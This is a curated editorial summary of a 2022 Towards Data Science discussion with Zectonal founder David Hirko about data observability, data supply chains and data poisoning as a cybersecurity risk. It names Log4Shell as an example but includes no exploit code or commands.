David Hirko - AI observability and data as a cybersecurity weakness

2022-09-28 · Source: Towards Data Science · Field: Technology & Digital — Artificial Intelligence & Machine Learning, Data Science & Analytics, Cybersecurity & Data Privacy · Depth: Intermediate, extended

Summary

David Hirko, founder of Zectonal, discusses data observability and its critical role in cybersecurity, particularly in the context of AI and machine learning. He highlights the challenge of ensuring data quality and provenance at scale, noting that many organizations assume data legitimacy without proper verification. Hirko defines data observability as the process of monitoring macro (e.g., timeliness, staleness, volume) and micro (e.g., schema consistency, null values) quality trends in data. He introduces the concept of a "data supply chain," emphasizing the need to track data sources from individual sensors through multiple aggregators, akin to traditional manufacturing supply chains. The discussion also covers data poisoning as a cybersecurity threat, exemplified by the Log4Shell vulnerability, where malicious payloads embedded in data files can compromise internal systems, contrasting this with traditional internet-facing attacks. Zectonal's approach involves deep data inspection to detect issues before data enters a data lake, and Hirko anticipates the growing challenge of differentiating real from synthetic data.

Key takeaway

For CTOs and VPs of Data/AI, understanding and implementing robust data observability is no longer optional but a strategic imperative. Your organization's data supply chain is a significant attack surface, and vulnerabilities can be introduced through subtle data poisoning or quality degradation. Prioritize tools and processes that enable deep data inspection and pre-ingestion validation to safeguard your AI models and analytics from compromised data, especially as synthetic data becomes more prevalent.

Key insights

Data observability is crucial for ensuring data quality and security, especially as data becomes a primary attack vector for AI systems.

Principles

Assume data is not inherently trustworthy.
Data quality issues often stem from upstream supply chain anomalies.
Security must be embedded in data observability.

Method

Implement deep data inspection before ingestion into data lakes to prevent the introduction of bad quality or malicious data, monitoring both macro and micro data trends.

In practice

Scrutinize data provenance from third-party suppliers.
Conduct deep dives on ETL job failures to identify data anomalies.
Exercise caution when using untrusted data sources for projects.

Topics

Data Observability
Data Cybersecurity
Data Supply Chain
Data Poisoning
Synthetic Data

Best for: CTO, VP of Engineering/Data, Director of AI/ML, Data Scientist, Machine Learning Engineer, AI Security Engineer

Related on AIssential

Open in AIssential →

Editorial summary, takeaway, and curation by AIssential. Original article published by Towards Data Science.